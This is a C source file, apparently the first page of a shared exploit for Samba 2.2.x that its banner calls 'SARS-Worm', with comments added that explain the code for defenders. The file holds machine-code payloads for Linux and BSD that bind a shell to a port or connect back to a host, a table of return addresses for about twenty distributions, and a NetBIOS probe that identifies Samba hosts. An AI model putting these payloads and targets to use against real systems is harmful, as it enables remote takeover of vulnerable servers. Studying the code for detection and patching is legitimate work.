
📄 samd.c

📁 一个用C语言写的后门程序
💻 C
📖 第 1 页 / 共 3 页
/*
 * Declarations, payload tables and three socket helpers of a remote exploit
 * tool whose target table (targets[] below) names Samba 2.2.x builds on
 * several Linux and BSD distributions. The usage banner calls the program
 * "SARS-Worm".
 *
 * Only part of the program is present in this listing: shell(), handler(),
 * write_timer(), start_session(), exploit_normal() and exploit_openbsd32()
 * are declared below but not defined here, and no main() is visible.
 *
 * Reading notes for defenders:
 *   - is_samba() sends one UDP datagram to port 137 of the address it is
 *     given and inspects the reply; that probe is the only network traffic
 *     the visible code generates on its own.
 *   - The byte-string arrays are opaque machine-code payloads. Nothing in
 *     the visible code executes them locally; targets[] only stores
 *     pointers to two of them.
 *   - Hosts still running the Samba releases named in targets[] should be
 *     moved to a supported release, and NetBIOS/SMB services should not be
 *     reachable from untrusted networks.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Four-byte header layout; not referenced by the code visible in this part. */
typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

/* SMB header layout; not referenced by the code visible in this part. */
typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;

/* File-scope state; none of it is read or written by the functions below. */
int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

/*
 * Payload for the Linux entries of targets[].
 * NOTE(review): the name and the embedded bytes 2f 2f 73 68 / 2f 62 69 6e
 * ("//sh", "/bin") suggest x86 code that listens on a TCP port and starts a
 * shell. The bytes b0 ef following 66 68 would be port 45295 if read as a
 * big-endian port number - inferred from the bytes only, confirm by
 * disassembly before using it as a detection indicator.
 */
char
linux_bindcode[] =
	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
	"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
	"\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
	"\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
	"\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
	"\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
	"\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
	"\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
	"\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
	"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
	"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
	"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

/*
 * Payload for the FreeBSD/NetBSD/OpenBSD entries of targets[].
 * NOTE(review): presumably the BSD counterpart of linux_bindcode; it carries
 * the same b0 ef byte pair and the same "/bin", "//sh" bytes - confirm.
 */
char
bsd_bindcode[] =
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
	"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
	"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
	"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
	"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
	"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
	"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
	"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
	"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
	"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
	"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
	"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
	"\xeb\x9a";

/*
 * Not referenced by targets[] or by any function in this part.
 * NOTE(review): the name suggests a payload that opens an outbound
 * connection instead of listening; where it is used cannot be seen here.
 */
char
linux_connect_back[] =
	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
	"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
	"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
	"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
	"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
	"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
	"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
	"\x01\xcd\x80";

/*
 * Not referenced by targets[] or by any function in this part.
 * NOTE(review): presumably the BSD counterpart of linux_connect_back.
 */
char
bsd_connect_back[] =
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
	"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
	"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
	"\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
	"\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
	"\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
	"\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
	"\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

/*
 * Per-target table: a display label, a 32-bit value `ret`, the payload to
 * use and an OS class. The exploit_normal()/exploit_openbsd32() prototypes
 * take (ret, shellcode), so the entries are presumably handed to them by
 * code outside this part - confirm against the rest of the file.
 * The labels double as an inventory of the builds the author considered
 * affected, which is the useful part for an exposure check.
 */
struct {
	char *type;
	unsigned long ret;
	char *shellcode;
	int os_type;	/* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */
} targets[] = {
	{ "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode,	0 },
	{ "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,    0 },
	{ "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode,	0 },
	{ "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode,	0 },
	{ "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,    0 },
	{ "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 	0 },
	{ "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 	0 },
	{ "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 	0 },
	{ "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode,	0 },
	{ "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,    0 },
	{ "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,  	0 },
	{ "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,    0 },
	{ "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     	1 },
	{ "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode,	1 },
	{ "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode,	1 },
	{ "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,      1 },
	{ "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode,	2 },
	{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,      2 },
	{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,      2 },
	{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,      2 },
	{ "Crash (All platforms)              ", 0xbade5dee, linux_bindcode,	0 },
};

/* Forward declarations; several of these are defined outside this part. */
void shell();
void usage();
void handler();
int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

/*
 * Print the two-line banner to stderr and terminate with exit status 1.
 * The format string contains no conversion, so `prog` is passed to
 * fprintf() but never printed.
 */
void usage(char *prog)
{
	fprintf(stderr, "============================Main of SARS-Worm============================\n"
	                "==========================powered by H.L.C-Team==========================\n\n", prog);
	exit(1);
}

/*
 * Probe `ip` on UDP port 137 with the fixed datagram in nbtname and classify
 * the reply.
 *
 * ip       - dotted-quad address string, handed to Connect().
 * time_out - timeout in seconds, handed to Connect(), write_timer() and
 *            read_timer().
 *
 * Returns 0 when the six bytes that follow `total` 18-byte entries in the
 * reply are all zero, 1 when they are not, and -1 on any socket, timeout or
 * parse failure.
 * NOTE(review): those six bytes are presumably the unit-ID (MAC) field of a
 * NetBIOS node-status response, which Samba reports as zeros - confirm
 * against the protocol layout. How callers interpret 0 versus 1 is not
 * visible in this part.
 *
 * Behaviour worth knowing when observing this probe from the receiving side:
 * the byte count returned by read() is not used, so a short reply is parsed
 * against the zero-filled remainder of recv_buf.
 */
int
is_samba(char *ip, unsigned long time_out)
{
	char	nbtname[]= /* netbios name packet */
	{
		0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
		0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
		0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
		0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
		0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
		0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
		0x00,0x01
	};
	unsigned char recv_buf[1024];
	unsigned char *ptr;
	int i = 0;
	int s = 0;
	unsigned int total = 0;

	/* Protocol 17 is UDP; note that a returned descriptor of 0 is treated as failure. */
	if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

	/* Connect() already closes the descriptor on its failure paths; it is closed again here. */
	if(Connect(s, ip, 137, time_out) == -1) {
		close(s);
		return -1;
	}

	/* Zero the buffer so bytes past a short reply read as 0x00. */
	memset(recv_buf, 0x00, sizeof(recv_buf));

	/* If write_timer() does not return 1 the query is skipped and the code still waits for a reply. */
	if(write_timer(s, time_out) == 1) {
		if (write(s, nbtname, sizeof(nbtname)) <= 0) {
			close(s);
			return -1;
		}
	}

	if (read_timer(s, time_out) == 1) {
		if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
			close(s);
			return -1;
		}

		/* The byte at offset 56 is taken as the entry count; entries start at offset 57. */
		ptr = recv_buf + 57;
		total = *(ptr - 1); /* max names */

		/* Step over 18-byte entries until `total` of them have been skipped. */
		while(ptr < recv_buf + sizeof(recv_buf)) {
			ptr += 18;
			if (i == total) {
				/* Back up so that ptr + 1 is the first byte after the last entry. */
				ptr -= 19;

				if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
				     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
					close(s);
					return 0;
				}
				close(s);
				return 1;
			}
			i++;
		}
	}

	/* Reached on read timeout or when the entry count runs past the buffer. */
	close(s);
	return -1;
}

/*
 * connect() with a timeout: switch `fd` to non-blocking mode, start the
 * connect to ip:port, wait up to `time_out` seconds with select(), then
 * restore the original file-status flags.
 *
 * Returns 1 on success and -1 on failure. Every -1 path closes `fd` first,
 * so the caller must not use the descriptor after a failure.
 * The return value of inet_pton() is not checked.
 */
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{
	/* ripped from no1 */
	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;

	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	/* Remember the current flags so blocking mode can be restored later. */
	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return -1;
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return -1;
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;

	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		/* EINPROGRESS is the expected result for a non-blocking connect. */
		if(errno != EINPROGRESS) {
			close(fd);
			return -1;
		}
	}
	else {
		/* Connected immediately: restore the flags and report success. */
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}

		return 1;
	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	/* 0 means the timeout expired. */
	if(select_status == 0) {
		close(fd);
		return -1;
	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		/* SO_ERROR is consulted only when the socket is both readable and writable. */
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
			}
			else {
				/* Surface the pending socket error to the caller through errno. */
				errno = getsockopt_error;
				close(fd);
				return (-1);
			}
		}
	}
	else {
		/* Neither set has fd: the descriptor is closed, yet 1 is returned. */
		close(fd);
		return 1;
	}

	/* Only one of readable/writable was set: treated as connected. */
	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}

	return 1;
}

/*
 * Wait up to `time_out` seconds for `fd` to become readable.
 *
 * Returns 1 when select() reports the descriptor readable (after restoring
 * the original file-status flags) and -1 on timeout or error. Every -1 path
 * closes `fd`, so a caller that closes it again closes an already released
 * descriptor number.
 */
int read_timer(int fd, unsigned int time_out)
{
	/* ripped from no1 */
	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;

	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);

	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	/* 0 means the timeout expired. */
	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}

	if(FD_ISSET(fd, &fdread)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}

		return 1;
	}
	else {
		/* select() succeeded without fd in the set: the descriptor is closed, yet 1 is returned. */
		close(fd);
		return 1;
	}
}
